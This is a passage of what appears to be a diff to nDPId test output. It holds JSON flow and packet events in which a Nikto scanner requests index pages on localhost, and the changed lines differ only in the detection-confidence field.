Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.shtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.shtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1576420276815,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276815,"pkt":"AAAAAAAAAAAAAAAACABFAADGtzZAAEAGhPl\/AAABfwAAAcJKH5BukY8IX6sJe4AYAED+ugAAAQEICp1m+3edZvt2R0VUIC9pbmRleC5jZm0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1576420276817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276817,"pkt":"AAAAAAAAAAAAAAAACABFAADGzfJAAEAGbj1\/AAABfwAAAcJMH5CEyfXFi\/ZWqoAYAED+ugAAAQEICp1m+3mdZvt5R0VUIC9pbmRleC5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1576420276819,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276819,"pkt":"AAAAAAAAAAAAAAAACABFAADFj3JAAEAGrL5\/AAABfwAAAcJOH5DAfLdF0MycV4AYAED+uQAAAQEICp1m+3udZvt7R0VUIC9pbmRleC5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1576420276820,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276820,"pkt":"AAAAAAAAAAAAAAAACABFAADG77xAAEAGTHN\/AAABfwAAAcJQH5DIa9eQqgE4nYAYAED+ugAAAQEICp1m+3ydZvt8R0VUIC9pbmRleC5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1576420276821,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276821,"pkt":"AAAAAAAAAAAAAAAACABFAADHQ2dAAEAG+Md\/AAABfwAAAcJSH5BEZHtRsCeOn4AYAED+uwAAAQEICp1m+32dZvt9R0VUIC9pbmRleC5hc3B4IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCg0K"} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1576420276823,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276823,"pkt":"AAAAAAAAAAAAAAAACABFAADI9WNAAEAGRsp\/AAABfwAAAcJUH5Atl81VKdEVGoAYAED+vAAAAQEICp1m+3+dZvt\/R0VUIC9kZWZhdWx0LmFzcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1576420276824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276824,"pkt":"AAAAAAAAAAAAAAAACABFAADJPphAAEAG\/ZR\/AAABfwAAAcJWH5C0BwahLC3FVoAYAED+vQAAAQEICp1m+4CdZvuAR0VUIC9kZWZhdWx0LmFzcHggSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
